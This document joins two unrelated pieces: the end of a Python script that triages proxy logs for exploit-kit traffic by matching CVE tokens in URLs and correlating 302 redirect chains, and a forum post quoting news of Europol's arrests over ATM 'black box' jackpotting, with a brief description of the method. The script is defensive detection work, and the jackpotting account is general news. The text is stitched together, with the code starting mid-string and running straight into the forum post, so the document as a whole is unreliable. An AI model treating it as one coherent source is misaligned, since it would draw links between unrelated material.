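2017-05-22T10:05:00 10.0.0.7 GET http://news.example/article 200 -
2017-05-22T10:05:01 10.0.0.7 GET http://cdn.example/a.js 200 http://news.example/article
"""

# Matches cve20132551, cve2013-2551, cve_2013_2551 ... anywhere in a URL.
CVE_TOKEN_RE = re.compile(r"cve[-_]?(\d{4})[-_]?(\d{4,7})", re.I)


def parse_proxy_log(text):
    """Parse the constructed six-column format; other lines are skipped."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 6:
            continue
        ts, client, method, url, status, referer = parts
        events.append({"ts": datetime.fromisoformat(ts), "client": client,
                       "method": method, "url": url, "status": int(status),
                       "referer": referer})
    return events


def cve_tokens(url):
    """Normalised CVE ids found in the URL path or query (cve20132551 -> CVE-2013-2551)."""
    return [f"CVE-{year}-{num}" for year, num in CVE_TOKEN_RE.findall(url)]


def triage(events, window=timedelta(seconds=30)):
    """Return alerts as tuples:
      ('cve-token', client, cve_id, url)            any request carrying a CVE token
      ('ek-chain', client, gate_host, landing_host) that request preceded, within
                                                    `window`, by a 302 served from
                                                    a different host (the gate)."""
    alerts = []
    by_client = defaultdict(list)
    for e in events:
        by_client[e["client"]].append(e)
    for client, evs in by_client.items():
        evs.sort(key=lambda e: e["ts"])
        for i, e in enumerate(evs):
            cves = cve_tokens(e["url"])
            for cve in cves:
                alerts.append(("cve-token", client, cve, e["url"]))
            if not cves:
                continue
            landing = urlparse(e["url"]).hostname
            for prior in reversed(evs[:i]):          # walk back through recent requests
                if e["ts"] - prior["ts"] > window:
                    break
                gate = urlparse(prior["url"]).hostname
                if prior["status"] == 302 and gate != landing:
                    alerts.append(("ek-chain", client, gate, landing))
                    break
    return alerts


if __name__ == "__main__":
    for alert in triage(parse_proxy_log(SAMPLE_PROXY_LOG)):
        print(alert)
```

The CVE-token rule is cheap and specific while the kit keeps that habit, which is exactly the kind of thing the next Terror build will change; the 302-chain correlation is the more durable of the two signals. Because the exploit download itself is gated on a cookie, as the post notes, the proxy log is often all an investigator gets, so the `ek-chain` tuple (gate host, landing host, client) is what to pivot on for the other victims.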
Old 17 Hours Ago   #72
OUTLAW 09
Council Member


27 people have been arrested by Europol for jackpotting attacks on ATMs across many countries in Europe.

Quote:
Europol has arrested 27 people accused of being involved in a series of successful black box attacks against ATMs across Europe. Since 2016, these attacks have resulted in more than €45 million in losses.

“The efforts of a number of EU Member States and Norway, supported by Europol’s European Cybercrime Centre (EC3) and the Joint Cybercrime Action Taskforce (J-CAT), culminated in the arrest of 27 individuals linked with so-called ATM “Black Box” attacks across Europe.” states Europol. “Perpetrators responsible for this new and sophisticated method of ATM jackpotting were identified in a number of countries over different periods of time in 2016 and 2017. There were arrests in Czech Republic (3), Estonia (4), France (11), the Netherlands (2), Romania (2), Spain (2) and Norway (3).”

First attacks were observed in 2015, but the technique was widely adopted by crooks since 2016.

“In a European ATM Crime Report covering 2016 EAST has reported that ATM black box attacks were up 287% when compared to 2015.” states the European ATM Security Team (EAST).

“A total of 58 such attacks were reported by ten countries, up from 15 attacks during 2015. ‘Black Box’ is the connection of an unauthorised device which sends dispense commands directly to the ATM cash dispenser in order to ‘cash-out’ the ATM. Related losses were down 39%, from €0.74 million to €0.45 million.”
The technique is very effective, it has been estimated that crooks have stolen €45 million using it since 2016.

The attack method was first reported by the notorious expert Barnaby Jack in 2010, the researcher coined the term jackpotting during the 2010 Black Hat conference.

The brute-force black box attack against an ATM starts by punching a hole into the machine’s casing; then the crooks connect a laptop to the exposed cables or ports and use it to issue commands to the ATM to dispense money.

The arrests were part of a still ongoing Europol operation conducted with law enforcement of numerous states in Europe. Below are the details of the arrests:
Netherlands (2 people)
Romania (2 people)
Spain (2 people)
Norway (3 people)
Czech Republic (3 people)
Estonia (4 people)
France (11 people)
“Our joint efforts to tackle this new criminal phenomenon resulted in significant arrests across Europe. However the arrest of offenders is only one part of stopping this form of criminality. Increasingly we need to work closely with the ATM industry to design out vulnerabilities at source and prevent the crime taking place,” said Steven Wilson, Head of Europol’s European Cybercrime Centre.
Criminals that were involved in the jackpotting ATM Black Box attacks are mainly from countries in Eastern Europe, such as Romania, Moldova, Russia, and Ukraine.
Video of this type of attack....
https://youtu.be/3HYA0MvizpM

Powered by vBulletin® Version 3.8.9. ©2000 - 2017, Jelsoft Enterprises Ltd.
Registered Users are solely responsible for their messages.
Operated by, and site design © 2005-2009, Small Wars Foundation